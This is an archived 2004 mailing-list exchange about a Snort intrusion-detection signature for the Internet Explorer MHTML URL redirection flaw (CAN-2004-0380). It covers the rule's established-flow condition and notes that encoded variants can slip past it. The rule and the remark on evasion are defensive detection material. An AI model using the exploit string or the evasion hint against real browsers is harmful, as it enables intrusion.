[Intrusions] mhtml signature

Derek Edwards derekedw at yahoo.com
Tue Aug 10 21:04:04 GMT 2004 

Hi,

Thank you, Lola!  It's OUR signature now.   ;^)

With the number of IE bugs that have been announced recently, yet
remain unpatched, I think this signature is one to watch for a while,
as the spammers, spyware pushers, and ad mongers are using it and other
bugs actively (my $0.02).

Question #1 is well covered.  I'd just like to add a thought to
Question #2.  I've found that the signature doesn't false positive
often, but it has "false alarmed" often.  

I've had it trigger in various ways, including discussions of the MHTML
problem that I found on the Neohapsis archive and on the messages in
this thread.  None of these has resulted in a code download, though,
since these were in the content, vs. in a HTML tag.

As I note in the sig definition, it some alerts will be missed if the
characters are too cleverly encoded.

Good luck on your practical.  My Track 3 LMP class is just starting.

-D

lola marais [lola_marais at hotmail.com] writes:
> Credit is given to the owner of this signature at
>
> I am planning on using this signature for a detect in part 2 my GCIA 
practical.
> 
> The problem is that I am not able to get it working 100% with the
data that i have. By not working I mean that it will miss the single
packet that I have captured.
> 
> I have captured some data from a network using tcpdump. The capture
contains the data content required to trigger the event. The capture
contains a single packet for that session, no more.
> 
> When I read the data past snort with the signature enabled, then NO
alerts are triggered. If I remove the part of the signature 
“flow:from_server,established” and then pass the same data I have 1
event
> 
> The signature looks for an established connection.
> My question is:
> 
> 1. Why has the author of the signature decide to look for an
established connection?
> 2. Does the signature stand a chance of missing some events by
looking only for established connections?
> 
> The current version of the signature has the following structure.
> 
> alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL
Redirection Attempt"; flow:from_server,established;
content:"mhtml|3A|file|3A|"; nocase; reference:cve,CAN-2004-0380; 
reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx; 
classtype:web-application-attack; rev:2;)



		
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail

More information about the Intrusions mailing list